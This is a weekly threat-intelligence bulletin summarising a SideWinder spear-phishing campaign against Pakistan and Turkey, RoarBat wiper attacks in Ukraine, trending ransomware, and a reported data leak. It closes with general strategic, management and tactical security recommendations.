Published On : 2023-05-12
Weekly Attack Type and Trends
Key Intelligence Signals:
- Attack Type: Malware Implants, Spear Phishing, Ransomware Attacks, Vulnerabilities & Exploits, Data Leak.
- Objective: Unauthorized Access, Data Theft, Data Encryption, Financial Gains, Payload Delivery, Espionage, and Data Destruction.
- Business Impact: Data Loss, Financial Loss, Reputational Damage, Loss of Intellectual Property, Operational Disruption.
- Ransomware – LockBit 3.0 Ransomware | Malware – FLUHORSE
- LockBit 3.0 Ransomware – One of the ransomware groups.
- Please refer to the trending malware advisory for details on the following:
- Malware – FLUHORSE
- Behavior –Most of these malwares use phishing and social engineering techniques as their initial attack vector. Apart from these techniques, exploitation of vulnerabilities, defence evasion, and persistence tactics are being observed.
Threat Actor in Focus
Indian APT SideWinder Targets Pakistan Alongside Turkey
- Suspected Threat Actors: SideWinder
- Attack Type: Spear Phishing
- Target Geography: Pakistan and Turkey
- Target Industry: Government
- Objective: Data Theft and Espionage
- Target Technology: Windows
- Business Impact: Data Loss and Operational Disruption
Summary:
In a recent observation, researchers detected a campaign that was initiated in November 2022 and piloted by APT SideWinder. The APT is also known by the names Rattlesnake and T-APT4, the APT SideWinder belongs to India and is operating since the year 2012. The APT commonly targets the government and for a decade Pakistan remained their primary target. In a recent attack, the threat actor used server-based polymorphism techniques to deploy the second-stage payload, potentially evading traditional signature-based antivirus detection. As we mentioned above, APT SideWinder initiated a campaign in late November 2022, the threat actor crafted spear phishing emails with malicious documents attached, that resonated with the interests of the Pakistani government. One malicious document titled “GUIDELINES FOR BEACON JOURNAL – 2023 PAKISTAN NAVY WAR COLLEGE (PNWC)” was attached and another document named “PK_P_GAA_A1_Offerred.docx” was dropped in early December 2022. This eight-page document masquerades as a letter of offer and acceptance for defense articles and services. Notably, none of the documents employed embedded malicious macro code to deliver the subsequent payload. Instead, the SideWinder group exploited the CVE-2017-0199 vulnerability, specifically, remote template injection. During the period, when the malicious server was active, the threat group configured their servers in a way that if a user or victim entered the malicious URL into their browser, they would be redirected to the legitimate Pakistan Navy homepage. In early March, a new document surfaced, distributed through phishing emails. Notably, this OLE document contained the address of the connection to the malicious server and was configured to target victims in Turkey.
Insights:
Server-side polymorphism is an old technique employed by a limited number of Advanced Persistent Threat groups, which reduces the risk of Anti-Virus detection. This technique was employed by APT Cloud Atlas in their campaign in the year 2019.
Major Geopolitical Developments in Cybersecurity
Wipers appear in Ukraine again
The Ukrainian agency CERT-UA warns that the threat group UAC-0165, almost certainly of Russian origin and very likely a subgroup of Sandworm, a unit of Russian military intelligence, has deployed RoarBat wipers against networks in Ukraine. As a result, the performance of electronic computing machines (server equipment, automated user workplaces, data storage systems) was impaired across a range of government and private organizations.
A similar attack has been claimed earlier this year against the national Ukrainian news service by the nominal hacktivist group “CyberArmyofRussia_Reborn”. CERT-UA points out that organizations can take measures to protect themselves against RoarBat by implementing basic tactical recommendations, similar to those issued by CYFIRMA to its clients. Successful implementation of the attack, in this case, was facilitated by the lack of multi-factor authentication, when making remote VPN connections, and the lack of network segmentation and filtering of incoming, outgoing, and inter-segment information flows.
Other Observations
CYFIRMA Research team observed that potential data leak related to E3 Techno Limited {www[.]e3techno[.]com). E3 Techno Limited is a privately held company based in Bangladesh that specializes in developing software solutions for web, Android, and iOS platforms. The confidential information of customers is included in the data leak.
Source: Underground forums
STRATEGIC RECOMMENDATION
- Attack Surface Management should be adopted by organizations, ensuring that a continuous closed-loop process is created between attack surface monitoring and security testing.
- Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
- Incorporate Digital Risk Protection (DRP) in the overall security posture that acts as a proactive defence against external threats targeting unsuspecting customers.
- Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, active network monitoring, through next generation security solutions and ready to go incident response plan.
- Create risk-based vulnerability management with deep knowledge about each asset. Assign a triaged risk score based on the type of vulnerability and criticality of the asset to help ensure that the most severe and dangerous vulnerabilities are dealt with first.
MANAGEMENT RECOMMENDATION
- Take advantage of global Cyber Intelligence providing valuable insights on threat actor activity, detection, and mitigation techniques.
- Proactively monitor the effectiveness of risk-based information security strategy, the security controls applied and the proper implementation of security technologies, followed by corrective actions remediations, and lessons learned.
- Move beyond the traditional model of security awareness towards improved simulation and training exercises that mimic real attack scenarios, account for behaviours that lead to a compromised, and are measured against real attacks the organization receives.
- Consider implementing Network Traffic Analysis (NTA) and Network Detection and Response (NDR) security systems to compensate for the shortcoming of EDR and SIEM solutions.
- Detection processes are tested to ensure awareness of anomalous events. Timely communication of anomalies and continuously evolved to keep up with refined ransomware threats.
TACTICAL RECOMMENDATION
- Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed since vulnerabilities are one of the top attack vectors.
- Consider using security automation to speed up threat detection, improve incident response, increased the visibility of security metrics, and rapid execution of security checklists.
- Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthen defences based on tactical intelligence provided.
- Deploy detection technologies that are behavioural anomaly-based to detect ransomware attacks and help to take appropriate measures.
- Implement a combination of security control such as reCAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), Device fingerprinting, IP backlisting, Rate-limiting, and Account lockout to thwart automated brute-force attacks.
- Ensure email and web content filtering uses real-time blocklists, reputation services, and other similar mechanisms to avoid accepting content from known and potentially malicious sources.